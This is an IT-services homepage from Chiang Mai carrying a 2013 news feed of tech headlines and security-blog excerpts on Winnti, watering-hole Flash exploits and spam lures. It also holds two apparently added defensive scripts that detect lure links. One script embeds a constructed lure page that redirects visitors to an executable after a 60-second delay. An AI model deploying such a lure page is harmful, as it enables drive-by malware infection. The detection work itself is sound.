Farang I.T. Home: computer service in Chiang Mai
Welcome to Farang I.T. Services, based in Chiang Mai, Thailand, offering a full range of services to commercial and domestic computer users, both locally and internationally. Our people are native speakers of many languages, including English, Suomi, French, Spanish, and of course, Thai.
We know how important it is to be able to communicate effectively with any service provider, and whether it's the engineer repairing your computer, the designer of your website, or anyone doing graphic design or programming work for you, it's absolutely vital!
We aim to provide a 'one-stop-I.T.-shop' for all your computer related needs. From everyday computer repair to designing and building a personal computer, a corporate logo, company stationery or website. Custom designed computers from a simple home P.C. to a gaming monster to a corporate server networked with 2,000 workstations, Windows, Linux or Mac.
"if we don't have it, we'll get it!"
Don't let computer problems get to you, call us for the fastest possible solution! Did you know that most problems are preventable? Call us to discuss a customised preventative maintenance plan for your home or office systems. Similar to a car's scheduled servicing, you don't wait for the engine to seize before changing the oil, so why wait for the computer to fail before looking after it?
"more important than what you already know,
is how quickly you can learn what you need to know!"

We can even provide training. Whether you are confused by your digital camera, stumped by your software, puzzled by your printer, or you wish to learn about the higher functions of Outlook, Word or Excel. Maybe you just bought your first Macintosh, or you want to try Linux, we can help!
"the only stupid question, is the one you didn't ask!"
LATEST VIRUS THREATS AND OTHER I.T. NEWS
Why this old-school Trekkie loves the 'Star Trek' reboots
Crave writer Amanda Kooser, a longtime Trekkie, looks at "Star Trek Into Darkness" through the lens of a long "Star Trek" history and (mostly) embraces the new ways.
Posted on 18 May 2013 | 12:00 pm
Gallo Micro SE: How can a speaker this small sound this good?
Few "lifestyle" speakers tempt discerning audiophiles, but Anthony Gallo Acoustics' latest crop of mini models will challenge their expectations.
Posted on 18 May 2013 | 10:36 am
Could Tumblr turn into Yahoo's MySpace?
Yahoo CEO Marissa Mayer seems dedicated to remaking Yahoo's image and infusing the company with a new spirit that Tumblr embodies.
Posted on 18 May 2013 | 10:09 am
Pixel's camera failure only one of many
The Chromebook Pixel may be pretty, but it can't talk to cameras -- among the many problems that keep it from being a primetime laptop.
Posted on 18 May 2013 | 10:00 am
Want a 10-foot-tall painting of 'Star Wars' action figures?
Artist Rob Buden is itching to create epic oil paintings of vintage Star Wars action figures. How about a 10-foot Hoth scene in your living room?
Posted on 18 May 2013 | 9:00 am
NoSuchCon 2013
Fostering knowledge exchange among different generations of security researchers is maybe one of the best traits of a good security conference. Judging by its attendance, NoSuchCon can easily claim to be one of these. It's rare to see such a mix of young researchers and old gurus exchanging ideas and getting to know each other. Organized this year in Paris, NoSuchCon takes place in the premises of the Espace Oscar Niemeyer; putting a security conference inside an art exhibition centre is indeed a nice move (congrats to the organizers :)).
Posted on 18 May 2013 | 8:00 am
Winklevoss twins on Bitcoin: Time to work with the Feds
Cameron and Tyler Winklevoss, who parlayed Facebook cash into a multi-million dollar Bitcoin stake, say making money means working with the Feds. Meanwhile, the Bitcoin Foundation is about to hire its first D.C. lobbyist.
Posted on 18 May 2013 | 7:00 am
How BlackBerry is fixing its once 'broken' brand
Chief Marketing Officer Frank Boulben is trying to re-energize the brand by focusing on the BlackBerry name, eschewing old standbys like Bold and Curve.
Posted on 18 May 2013 | 7:00 am
DirecTV reportedly wants to buy Hulu, again
The satellite TV provider is eyeing the video streaming service, according to news reports.
Posted on 17 May 2013 | 9:22 pm
Yahoo to consider $1.1B price tag for Tumblr this Sunday -- report
Yahoo's board of directors will decide on an all-cash offer for the hip blogging site this weekend, AllThingsD reports.
Posted on 17 May 2013 | 8:32 pm
Q&A: MacFixIt Answers
Readers ask questions about library locations, Wi-Fi networks, and using an internal hard drive as an external drive.
Posted on 17 May 2013 | 7:53 pm
Ready for Windows 8? We're just starting on Win 7, says Dell
Some big Dell customers are just beginning to migrate to Windows 7 -- an operating system that came out in 2009.
Posted on 17 May 2013 | 7:30 pm
Crave Ep. 121: Wake up to a dancing iPhone
This week, we take a look at a dancing robotic iPhone dock; salute astronaut Chris Hadfield on his return to Earth; and demonstrate an essential service that lets you put your face on your pet's face.
Posted on 17 May 2013 | 7:05 pm
Google's top product of I/O 2013: You
Instead of gadgets, the message is clear: Google's personalized services are aiming to get into your head and be a part of you...and your social life.
Posted on 17 May 2013 | 6:50 pm
Making sense of Google's high Galaxy S4 price tag
When Google announced its exclusive version of the Samsung Galaxy S4 at Tuesday's keynote, many were left wondering about its $649 value.
Posted on 17 May 2013 | 6:36 pm
How to handle OS X firmware updates that won't install
If you've got an OS X firmware update that just refuses to install properly, there are a few things you can try to remedy the situation.
Posted on 17 May 2013 | 6:35 pm
Forced to live with BB10, and kind of liking it
After losing my HTC One Android, I had to rely solely on BlackBerry 10.
Posted on 17 May 2013 | 5:54 pm
BBQ Dragon can light a grill fire in 10 minutes or less
If you have a problem getting the charcoal lit, the BBQ Dragon wants to be your summertime savior.
Posted on 17 May 2013 | 5:50 pm
Watch the tiny teaser trailer for Batman: Arkham Origins
It's less than a minute long, but the trailer for the next Batman game introduces at least one new antagonist.
Posted on 17 May 2013 | 5:25 pm
Intel kicks off ultrabook road trip in New York
The chipmaker is traveling the globe to show consumers some of the newest PCs and tablets.
Posted on 17 May 2013 | 5:07 pm
Which ear you hold your cell phone to may reveal brain dominance
Researchers at Henry Ford Hospital in Detroit say that, similar to handedness, most people who hold their cell phones to their left ear are right-hemisphere dominant and vice versa.
Posted on 17 May 2013 | 4:59 pm
The Week in Pictures: Google's utopia to a stem cell burger
Google CEO Larry Page imagines a tech-driven utopia, robotic bees take flight, and a $325,000 stem cell hamburger is ready to be eaten.
Posted on 17 May 2013 | 4:52 pm
Google cuts network usage by terabytes by switching to WebP
Google is happy enough with WebP to spread it across the company, including the Google+ app on Android. Also: new features coming to WebP.
Posted on 17 May 2013 | 4:46 pm
Apple removes Bang With Friends from App Store
The eyebrow-raising app won't be initiating Facebook-friend hookups for iPhone owners for the time being.
Posted on 17 May 2013 | 4:43 pm
A coffeemaker for every day of the week
The Hamilton Beach (Model 49983) Two-Way Deluxe Coffeemaker can brew into a travel mug or a 12-cup carafe. Either K-cups or ground coffee can be used.
Posted on 17 May 2013 | 4:07 pm
Future Firefox takes tougher stance on mixed content
Mozilla might be fine with mixed company, but it's not fond of mixed content. A new tool to block unsecured content on secure sites makes its debut in the latest update to Firefox Aurora.
Posted on 17 May 2013 | 3:52 pm
Malicious PACs and Bitcoins
Now cybercriminals from Brazil are also interested in the Bitcoin currency. To join the horde of phishers on the lookout for the virtual currency, they have applied their best-known malicious technique: malicious PACs delivered through web attacks, plus phishing domains.
The malicious use of PAC (Proxy Auto-Config) files among Brazilian black hats is nothing new: we have known about it since 2007. Generally, this kind of malicious script is used to redirect the victim's connections to phishing pages for banks, credit cards and so on. We described these attacks in detail here. In 2012 a Russian banking Trojan called Capper also started using the same technique. When it is combined with drive-by-download attacks, it becomes very effective.
After registering the domain java7update.com, Brazilian criminals started attacking several websites, inserting a malicious iframe in some compromised pages:

Posted on 17 May 2013 | 9:58 am
Microsoft Updates May 2013 - Slew of Internet Explorer Critical Vulnerabilities, Kernel EoP, and Others
Microsoft released a long list of updates for Microsoft software today. The most interesting appear to be those patching Internet Explorer and the kernel software vulnerabilities. In all, ten critical "use-after-free" vulnerabilities are patched in IE along with one important Information Disclosure vulnerability, and three elevation of privilege vulnerabilities are being patched as well. Almost all of these IE vulnerabilities were reported by external security researchers working through HP's Zero Day Initiative.
The recent Internet Explorer 8 0day, implemented with ROP to work across ASLR-protected Windows 7 and hosted on the compromised Department of Labor website and others, was used as part of a targeted watering hole campaign suggested to be run by the known threat actor "DeepPanda". This IE 0day was reported by the guys over at FireEye and iSight Partners. It is being patched with Security Bulletin MS13-038. The others may not have been actively used by threat actors, but as always, it is very important for all Internet Explorer users to apply these updates asap and avoid becoming a victim of the more common financially motivated mass-exploitation schemes.
A bit less sexy but very important for organizations to update are the three "Important" kernel elevation of privilege vulnerabilities. While these are not yet known to have been publicly exploited, EoPs are actively used for post-exploitation purposes and are a significant part of any infiltration exercise. All three of these problems were reported by external security researchers, to whom Microsoft extended a "thanks".
Organizations should also be aware that Http.sys in Windows 8, Windows RT and Windows 2012 is vulnerable to denial of service attacks, but exploiting this bug appears to be very difficult. Accordingly, they are rating it "Important".
Other client side apps are being patched with "Important" rated updates as well, including Word, Publisher, and more. More information on all of these updates can be found over at Microsoft's summary.
Also today, Adobe's PSIRT pushed several important updates in ColdFusion (in the crosshairs for persistent attackers on organizations) and both of their big client side apps Flash and Reader/Acrobat.
Posted on 14 May 2013 | 2:06 pm
Telecom fraud - phishing and Trojans combined
In China telecom fraud has become an increasingly common crime. Last year there were more than 170,000 telecom fraud cases, causing the loss of over $12.5 billion. The fraudsters usually call their victims and trick them into transferring cash to a criminal gang via an ATM. But recently a new breed of telecom fraud, which combines phishing sites and backdoor Trojans, has emerged.
Last week the police from the Dongcheng sub-branch of Beijing’s Public Security Bureau asked us to help investigate a telecom fraud case. The victim was defrauded of $100,000. After our investigation, the fraudsters’ tactics were laid bare.
So how does the scam work? How was the victim deceived?
First you get a call from a ‘public prosecutor’ saying that you are implicated in a financial crime and you must help with the investigation. Of course, you deny everything, but the ‘public prosecutor’ advises you to check if you are listed in an official database as a suspected criminal. To do this, they tell you to visit the “Supreme Procuratorate’s” website, which is, of course, a phishing site:
Posted on 13 May 2013 | 3:15 am
CeCOS VII
The Counter eCrime Operations Summit VII (CeCOS VII) engages questions of operational challenges and the development of common resources for the first responders and forensic professionals who protect consumers and enterprises from the electronic-crime threat every day. The annual event, organized by the Anti-Phishing Working Group (APWG) is this time held in Buenos Aires, Argentina.

Posted on 26 April 2013 | 4:49 pm
Security policies: remote access programs
The experience of many information security officers shows that only a small portion of security incidents take place as a result of meticulously planned and sophisticated targeted attacks, while most incidents are due to a lack of effective security and control measures. This post begins a series of publications about IT security threats associated with the use of legitimate software.
TeamViewer
Hugely popular, easy-to-use and practical, remote access tools have been appreciated by system administrators and developers alike, as well as by anyone who has ever needed to log on to a work computer from a remote location, whether traveling on business, working from home, or caught out by an emergency while on vacation. However, unregulated use of this software poses a threat to corporate security and may lead to security incidents.
Posted on 25 April 2013 | 11:44 am
Lock, stock and two smoking Trojans-2
It has been three years since we published Lock, stock and two smoking Trojans in our blog. The article describes the first piece of malware designed to attack users of online banking software developed by a company called BIFIT. There are now several malicious programs with similar functionality, including:
- Trojan-Spy.Win32.Lurk
- Trojan-Banker.Win32.iBank
- Trojan-Banker.Win32.Oris
- Trojan-Spy.Win32.Carberp
- Trojan-Banker.Win32.BifiBank
- Trojan-Banker.Win32.BifitAgent
In spite of its functionality no longer being unique, the last program on the list caught our attention.

Words and strings used by Trojan-Banker.Win32.BifitAgent
This particular piece of malware has a number of features that set it apart from other similar programs.
Posted on 22 April 2013 | 12:24 pm
Is digital marketing the new spam?
What a week for being in Boston! I was heading to Source Conference the very same day the blast happened. It’s hard to describe all the intense emotions when I arrived. As president Obama said today to the city of Boston: “You will run again”. All my best to you guys, stay strong.

In my presentation at Source I talked about fraud on Twitter. These days we find a lot of spam bots on this social network, either blindly sending unsolicited direct messages to other users or first doing some semantic analysis of your tweets to produce a more targeted message.
Posted on 22 April 2013 | 1:54 am
An ambush for peculiar Koreans
While researching PlugX propagation via Java exploits we stumbled upon a compromised site that hosted and pushed a malicious Java applet exploiting the CVE-2013-0422 vulnerability. That malicious Java application was detected heuristically with the generic verdict for that vulnerability, and it would hardly have been possible to spot this particular site among the tons of other places where malicious Java applications were detected with the same generic verdict. But a very specific search was being conducted back then, and this site appeared in the statistics among not so many results. To be honest, it was a false positive in terms of the search criteria, but in this case it was a lucky mistake.
The infected website was an Internet resource named minjok.com, and it turned out to be a news site in Korean and English covering mostly political events around the Korean peninsula. We notified an editor of the site about the compromise and, although he has not responded, the site was closed after a while.
This is how minjok.com is described at http://www.northkoreatech.org/the-north-korean-website-list/minjok-tongshin/:
Description of minjok.com
Posted on 19 April 2013 | 6:24 am
Boston Aftermath
While many are still in shock after the Boston Marathon bombings on 16 April, it didn't take long for cyber criminals to abuse that tragic incident for their dirty deeds.

Today we started receiving emails containing links to malicious pages with names like "news.html". These pages embed non-malicious YouTube clips covering the recent events; after a delay of 60 seconds, another link, leading to an executable file, is activated.

The malware, once running on an infected machine, tries to connect to several IP addresses in Ukraine, Argentina and Taiwan. Kaspersky Lab detects this threat as "Trojan-PSW.Win32.Tepfer.*".
MD5sums of some of the collected samples:
5EA646FFDC1E9BC7759FDFC926DE7660
959E2DCAD471C86B4FDCF824A6A502DC
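The lure pattern described above (harmless video embeds, then a delayed jump to an executable) can be triaged statically. The following is an added example, not code from the original post and not a sample from the campaign: the page text is constructed for the example, the hostname is a TEST-NET address and the file name is a placeholder, not an indicator from the real attack.

```javascript
// Added example, not code from the original post: a static triage check for
// a lure page that shows harmless video embeds and only after a fixed delay
// sends the visitor to an executable. The HTML below is constructed for this
// example; the host is a TEST-NET address and the file name is a placeholder.
const SAMPLE_LURE_HTML = `
<html><body>
<h1>Boston explosion: raw video</h1>
<iframe width="640" height="360" src="https://www.youtube.com/embed/placeholder1"></iframe>
<iframe width="640" height="360" src="https://www.youtube.com/embed/placeholder2"></iframe>
<script type="text/javascript">
  setTimeout(function () {
    window.location = "http://203.0.113.5/news/boston_video.exe";
  }, 60000);
</script>
</body></html>`;

// A URL whose path ends in a Windows-executable extension.
const EXECUTABLE_URL_RE = /https?:\/\/[^\s"'<>]+?\.(?:exe|scr|pif|com|bat|cmd|jar)\b/i;

function executableUrls(text) {
  return [...text.matchAll(new RegExp(EXECUTABLE_URL_RE.source, "gi"))].map((m) => m[0]);
}

// Every setTimeout(...) call in the page with its argument text and delay.
// The argument list is cut at the matching closing parenthesis, so parens
// inside the callback body are handled (string literals are not parsed).
function extractTimeouts(html) {
  const calls = [];
  let idx = 0;
  while ((idx = html.indexOf("setTimeout(", idx)) !== -1) {
    const start = idx + "setTimeout(".length;
    let depth = 1;
    let i = start;
    for (; i < html.length && depth > 0; i++) {
      if (html[i] === "(") depth++;
      else if (html[i] === ")") depth--;
    }
    const args = html.slice(start, depth === 0 ? i - 1 : i);
    const m = args.match(/,\s*(\d+)\s*$/); // trailing numeric delay in ms
    calls.push({ args, delayMs: m ? Number(m[1]) : null });
    idx = i;
  }
  return calls;
}

// The <meta http-equiv="refresh" content="60;url=..."> form of the same trick.
function extractMetaRefresh(html) {
  const out = [];
  const re = /<meta[^>]+http-equiv=["']?refresh["']?[^>]+content=["']\s*(\d+)\s*;\s*url=([^"'>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    out.push({ delayMs: Number(m[1]) * 1000, url: m[2].trim() });
  }
  return out;
}

// Report executables the page would send the visitor to only after
// minDelayMs. Short delays are common on benign pages; a long one followed
// by an .exe is the lure pattern the post describes.
function findDelayedDownloads(html, minDelayMs = 10000) {
  const findings = [];
  for (const t of extractTimeouts(html)) {
    if (t.delayMs === null || t.delayMs < minDelayMs) continue;
    for (const url of executableUrls(t.args)) {
      findings.push({ kind: "setTimeout", delaySeconds: t.delayMs / 1000, url });
    }
  }
  for (const r of extractMetaRefresh(html)) {
    if (r.delayMs >= minDelayMs && EXECUTABLE_URL_RE.test(r.url)) {
      findings.push({ kind: "meta-refresh", delaySeconds: r.delayMs / 1000, url: r.url });
    }
  }
  return findings;
}

// Stand-alone run on the constructed page.
for (const f of findDelayedDownloads(SAMPLE_LURE_HTML)) {
  console.log(`${f.kind}: after ${f.delaySeconds}s -> ${f.url}`);
}
```

The delay is what separates this lure from an ordinary redirect: a sandbox or URL scanner that only waits a few seconds sees a page full of YouTube embeds and nothing else, so a static check for long timers and meta refreshes pointing at executables is worth running alongside dynamic analysis.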
Our thoughts and prayers are with our colleagues in Massachusetts and others affected by the tragic events in Boston.
Posted on 17 April 2013 | 12:02 am
Winnti returns with PlugX
Continuing our investigation into Winnti, in this post we describe how the group tried to re-infect a certain gaming company and what malware they used.
After discovering that the company's servers were infected, we began to clean them up in conjunction with the company's system administrator, removing malicious files from the corporate network. This took a while because it was not clear at first exactly how the cybercriminals had penetrated the corporate network; we couldn't find a way to completely stop attacks penetrating the network and malicious files kept appearing. An analysis performed by the gaming company itself led us to the conclusion that the infection started after establishing working contacts with a South Korean gaming company. This was also confirmed by our research: as we wrote before, the Winnti group is most active in East Asia and we identified 14 infected gaming companies in South Korea.
In the course of our efforts to remove the infection, the gaming company sent us suspicious files that were appearing on their computers. Many of these files were samples of Winnti malware. As soon as information about the malicious files was added to our antivirus databases, our products were used to remove Winnti malware from the gaming company's corporate network. However, the attackers reacted very rapidly: new malware samples mysteriously appeared on computers from which the infection had been completely removed the previous day. Eventually, though, our efforts proved successful and further access to the gaming company's computers was denied to the attackers.
However, just as we expected, it was too early to celebrate. Exactly one month after the gaming company's network had been cleaned, the Winnti group returned. The system administrator sent us suspicious files, which had been attached to messages sent to company employees. This was run-of-the-mill spearphishing: the attackers introduced themselves as computer game developers and pretended to be looking for opportunities related to working with large publishers.

Posted on 15 April 2013 | 8:30 am
Hello from Infiltrate 2013
Today is the second and last day of Infiltrate 2013 which is taking place in Miami Beach. It's my first time at Infiltrate and so far I've been really impressed with the quality of the conference.
The opening keynote by Chris Eagle definitely set the tone for the rest of the con, with a very clear focus on offense. Chris shared his own view on various issues concerning how the US Armed Forces - and the Navy in particular - deal with educating people on cyber.
One of the bits I found particularly interesting was the Title 10 issue. Many of the experts creating cyber-tools, which would make them best equipped to handle them, are civilians. However under Title 10, only military personnel can actually 'pull the trigger'. You can see how this can be problematic.
Posted on 12 April 2013 | 1:51 pm
Winnti-Stolen Digital Certificates Re-Used in Current Watering Hole Attacks on Tibetan and Uyghur Groups
A new-ish Flash exploit has been on the loose in attacks around the web. This time, the attackers have compromised a caregiver site providing support for Tibetan refugee children, the NGO "Tibetan Homes Foundation", and are spreading backdoors signed with Winnti-stolen certificates, delivered via Flash exploits. Previously, FireEye identified similar "Lady Boyle" related malicious swf files exploiting CVE-2013-0634. A notification has been sent to the contacts of the web site, but apparently the malicious footer.swf file is still hosted on the Foundation's web site, so please do not visit it just yet. Also, be sure to update your Flash player to the latest version.

This site certainly appears to be a classic example of a "watering hole" attack. F-Secure pointed out another Lady Boyle watering hole set up against a related Uyghur group, which has been targeted in tandem following the early March World Uyghur Congress. The delivered backdoors are shown to be signed with Winnti-stolen digital certificates in the F-Secure post, including the stolen MGAME certificate.
Here is an example of those same stolen certs reused for the backdoors in the Tibetan Homes Foundation incident. We see both the MGAME cert and the ShenZehn certs signing the backdoors; here are screenshots of the latter:
Our products detect the Flash exploit+payload as Exploit.SWF.CVE-2013-0634.a. Here is a heatmap of our worldwide detections. Note that not all of these detections are Lady Boyle related, I estimate that at least a third of them are:
Other sites hosting the Lady Boyle swf exploit over the past couple of months have included "tibetangeeks.com", who recently cleaned up their site and posted a cooperative plea to their attackers, and "vot.org" or the "Voice of Tibet" which is also cleaned up. Currently cleaned up but previously serving "Exploit.SWF.CVE-2013-0634.a" were Uyghur related sites "istiqlaltv.com" and "maarip.org", with the same "LadyBoyle" swf path as the Tibetan Homes Foundation, i.e.:
hxxp://maarip.org/uyghur/footer(.)swf
So, what we have is an active watering hole campaign implementing a fairly new Flash exploit and abusing digital certificates that were stolen as a part of the ongoing Winnti targeted attack campaigns on game developers and publishers.
Related md5:
BD9FD3E199C3DAB16CF8C9134E06FE12
215CEC7261D70A5913E79CD11EBC9ECC
12181311E049EB9F1B909EABFDB55427
Posted on 11 April 2013 | 8:31 pm
The Winnti honeypot - luring intruders
During our research on the Winnti group we discovered a considerable amount of Winnti samples targeting different gaming companies. Using this sophisticated malicious program cybercriminals gained remote access to infected workstations and then carried out further activity manually.
Naturally, we were keen to find out how the malicious libraries spread across a local network. To do so, we tracked the attackers' activity on an infected computer.
1st attempt: virtual machine #1
At the beginning of the investigation we ran the malicious programs on a virtual machine, which worked fairly well - we even spotted some cybercriminal activity. But they quickly realized it wasn't a computer they wanted to net. Once that happened, the attackers' servers stopped responding to requests from bots running on virtual machines.
This is what we managed to learn at this stage of our monitoring.
First of all, the perpetrators looked at what was happening on the victim's desktop. After that they enabled the remote command line and used it to browse the root folder of the current disk, search for the file winmm.dll, and check the operating system version. The ListFileManager plugin then came into play. It works with the file system and the attackers used it to browse the folders C:\Windows and C:\Work. Then they tried to restart the computer, but made a mistake in the parameters of the 'shutdown' command, having typed 'shutdown /t /r 1' (the computer should have been restarted in 1 second); after a while they shut the computer down completely with the correct command 'shutdown /s /t 1'.
Posted on 11 April 2013 | 9:23 am
Winnti FAQ. More than just a game
Today Kaspersky Lab's team of experts published a detailed research report that analyzes a sustained cyberespionage campaign conducted by the cybercriminal organization known as Winnti.
According to report, the Winnti group has been attacking companies in the online video game industry since 2009 and is currently still active.
The group's objectives are stealing digital certificates signed by legitimate software vendors in addition to intellectual property theft, including the source code of online game projects.
The attackers' favorite tool is the malicious program we called "Winnti". It has evolved since its first use, but all variants can be divided into two generations: 1.x and 2.x. Our publication describes both variants of this tool. In our report we publish an analysis of the first generation of Winnti.
The second generation (2.x) was used in one of the attacks which we investigated during its active stage, helping the victim to interrupt data transfer and isolate infections in the corporate network. The incidents, as well as results of our investigation, are described in the full report (PDF) on the Winnti group.
The Executive Summary is available here.
Is this research about a gaming Trojan from 2011? Why do you think it is significant?
This research is about a set of industrial cyberespionage campaigns and a criminal organization which massively penetrates many software companies and plays a very important role in the success of cyberespionage campaigns of other malicious actors.
It is important to be aware of this threat actor to understand the broader picture of cyberattacks coming from Asia. Having infected gaming companies that do business in the MMORPG space, the attackers potentially get access to millions of users. So far, we don't have data showing that the attackers stole from ordinary users, but we do have at least 2 incidents where the Winnti malware was planted on online game update servers and these malicious executables were spread among a large number of online gamers. The samples we observed did not seem to be malware targeting end-user gamers, but rather a malware module which accidentally got into the wrong place. However, the potential for attackers to misuse such access to infect hundreds of millions of Internet users creates a major global risk.
It's important to understand that many gaming companies do business not only in gaming; very often they are also developers or publishers of other types of software. We have tracked an incident where a compromised company served an update of its software which included a Trojan from the Winnti hacking team. That became an infection vector to penetrate another company, which in turn led to a personal data leak affecting a large number of its customers.
So far, this research is dedicated to a malicious group that not only undermines trust in fair gameplay but has a serious impact on trust in software vendors in general, especially in the regions where the Winnti group is active at the moment.
What are the malicious purposes of this Trojan?
The Trojan, or to be precise, a penetration kit called Winnti includes various modules to provide general purpose remote access to compromised machines. This includes general system information collection, file and process management, creating chains of network port redirection for convenient data exfiltration and remote desktop access.
Is this attack still active?
Yes, despite active steps to stop the attackers by the revocation of digital certificates, detection of the malware and an active investigation, the attackers remain active, with at least several victim companies around the world being actively compromised.
Posted on 11 April 2013 | 9:21 am
Microsoft Updates April 2013 - 3 Critical Vulnerabilities
Microsoft released two Bulletins this month patching 3 critical vulnerabilities. Along with these immediate issues, they released five other Bulletins rated "Important". It appears that the two critical Bulletins address use-after-free vulnerabilities that can all be attacked through Internet Explorer.
For the Windows workstation environments, all versions of Internet Explorer need to be patched asap, including v10 preview running on Windows RT. The patch for Internet Explorer 10 on Windows RT is available at the "Windows Update" site.
In addition to the privately reported vulnerabilities in Internet Explorer code itself, the Remote Desktop Connection v6.1 Client and Remote Desktop Connection v7.0 Client ActiveX components on XP, Vista, and Windows 7 are vulnerable. Microsoft's SRD team expects to see exploits available within 30 days targeting CVE-2013-1296.
Of the "Important" vulnerabilities, interesting to note is a privately reported Elevation of Privilege issue CVE-2013-0078, which is a bug in the Windows Defender anti-malware engine running on Windows 8 and Windows RT. This vulnerability could be used by an insider or determined adversary to gain further access, and not a type of vulnerability usually hit by mass exploitation kits. Within organizations, this is something to quickly address, but generally individuals do not need to urgently address this type of issue.
See Microsoft's Security Bulletin Summary for April 2013 for the full list of this month's Bulletin releases.
Posted on 9 April 2013 | 2:23 pm
Absent-minded spammers
A large number of scam emails disguised as newsletters sent by the CNN television channel have been detected again. Sensational headlines are used in the messages to grab the attention of recipients (e.g., falling stock indexes, the election of a new Pope etc.). Users are asked to click on the links provided in the messages to get access to the complete versions of the articles. To make them look authentic, the emails also include links to real CNN pages, but of course the link with the main piece of news is fake. It leads to a compromised website which uses JavaScript to redirect the user to a site hosting malware - in this case, the Blackhole exploit kit.

At the same time as the CNN newsletter scam, there has also been an epidemic of scam emails imitating Facebook notifications. In these emails, spammers suggested that users check out new comments on their photos. The mechanism used in the malicious link was the same as in the case described above. The most curious part, though, was that the scammers did not even bother to change the links. While in the former case the link included “cnnbrnews.html” after the domain name, the same ending in the link provided in fake Facebook messages looks out of place.

Unfortunately, this is the only part of the scam where the cybercriminals were careless. Emails containing the malicious links are still being distributed, so be cautious when handling suspicious messages.
Posted on 9 April 2013 | 9:42 am
Skypemageddon by bitcoining
Is it a Skype day? Or maybe a Bitcoin one? Or maybe just both? I say this because right after I published my previous post about the ongoing malware campaign on Skype, a mate from Venezuela sent me a screenshot of her Skype client with a similar campaign, similar in terms of propagation but different in terms of origins and purposes. Here is the original screenshot:

Posted on 4 April 2013 | 3:28 pm
An avalanche in Skype
There is a new malicious campaign running on Skype, and it is still active. The infection vector is social engineering: infected Skype clients send messages like these to all of their contacts:

  i don't think i will ever sleep again after seeing this photo http://www.goo.gl/XXXXX?image=IMG0540250-JPG
  tell me what you think of this picture i edited http://www.goo.gl/XXXXX?image=IMG0540250-JPG

The goo.gl short URL service shows more than 170k clicks on the malicious URL at the moment, up from around 160k only an hour ago. The campaign is therefore quite active, at around 10k clicks per hour, or roughly 2.8 clicks per second. Most of the victims are in Russia and Ukraine:

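The fake CNN newsletter, the Facebook notification that reused the same "cnnbrnews.html" path, and the Skype messages above all share a few cheap tells. The script below is an added example, not code from the original posts or from Kaspersky: it pulls links out of an HTML mail or a plain-text message and flags a host outside the brand the message claims to come from, a path tail reused across messages claiming different brands, and a URL shortener carrying an image-lure query string like the one in the Skype messages. The message bodies and the .invalid host names are constructed for the example; the goo.gl URL pattern is the one quoted in the post.

```python
"""Cheap tells in lure links from spam mail and IM messages (added example)."""
import re
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

URL_RE = re.compile(r"https?://[^\s<>\"']+")
SHORTENERS = {"goo.gl", "www.goo.gl", "bit.ly", "t.co", "tinyurl.com"}
IMAGE_LURE = re.compile(r"IMG\d+-?JPG", re.I)   # e.g. image=IMG0540250-JPG in the Skype lure


class _Anchors(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def extract_links(body):
    """HTML bodies yield anchors; plain text (IM messages) yields bare URLs."""
    if "<a " in body.lower():
        p = _Anchors()
        p.feed(body)
        return p.links
    return [(u, "") for u in URL_RE.findall(body)]


def _in_domain(host, domain):
    return host == domain or host.endswith("." + domain)


def assess_link(url, claimed_brand=None):
    """Return a list of findings for one URL; an empty list means nothing suspicious."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    findings = []
    if claimed_brand and not _in_domain(host, claimed_brand):
        findings.append("host %s is outside %s, the brand the message claims" % (host, claimed_brand))
    if host in SHORTENERS:
        values = [v for vs in parse_qs(parts.query).values() for v in vs]
        if any(IMAGE_LURE.search(v) for v in values):
            findings.append("URL shortener with an image-lure query string")
    return findings


def triage_messages(messages):
    """messages: [{"id", "brand", "body"}]. Returns (findings per message id,
    path tails that appear in messages claiming different brands)."""
    report, tails = {}, defaultdict(set)
    for m in messages:
        hits = {}
        for url, _text in extract_links(m["body"]):
            f = assess_link(url, m.get("brand"))
            if f:
                hits[url] = f
            tail = urlsplit(url).path.rsplit("/", 1)[-1]
            if tail:
                tails[tail].add(m.get("brand"))
        report[m["id"]] = hits
    reused = {t: sorted(b for b in brands if b) for t, brands in tails.items() if len(brands) > 1}
    return report, reused


# Constructed message bodies modelled on the lures described in the posts.
SAMPLES = [
    {"id": "cnn", "brand": "cnn.com", "body": """<html><body>
<p>Stock indexes fall sharply. <a href="http://www.cnn.com/">CNN Home</a> |
<a href="http://edition.cnn.com/business">Business</a></p>
<p><a href="http://compromised-site.invalid/cnnbrnews.html">Read the full story</a></p>
</body></html>"""},
    {"id": "facebook", "brand": "facebook.com", "body": """<html><body>
<p>Someone commented on your photo.
<a href="http://another-compromised.invalid/cnnbrnews.html">See the comment</a></p>
</body></html>"""},
    {"id": "skype", "brand": None,
     "body": "i don't think i will ever sleep again after seeing this photo "
             "http://www.goo.gl/XXXXX?image=IMG0540250-JPG"},
]

if __name__ == "__main__":
    rep, reused = triage_messages(SAMPLES)
    for mid, hits in rep.items():
        for url, f in hits.items():
            print(mid, url, f)
    print("path tails reused across brands:", reused)
```

The brand check only works if you know what the message claims to be (the From: display name or the branding in the body); the reused-path check needs no such knowledge and is the one that ties the two mail campaigns together.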
Posted on 4 April 2013 | 10:40 am
Virus calendar wallpapers for 2013
Some of you may remember the virus wallpaper calendars that we published in previous years, listing a selection of significant events in the history of the IT security industry.
Well, we're posting new versions for 2013.
April's wallpaper is here.
But be sure to check our calendar page each month as we'll be adding new wallpapers as we go through the year.
We hope they'll be an interesting background for your desktop, as well as highlighting key security events from the past.
Posted on 4 April 2013 | 4:06 am
The Biggest DDoS Ever that "Almost Broke the Internet"?
"If the Internet felt a bit more sluggish for you over the last few days in Europe, this may be part of the reason why." Well, "a bit more sluggish" for a limited set of communications in parts of Europe for a few days is not a broken Internet, and is certainly not close to a critical infrastructure disaster.
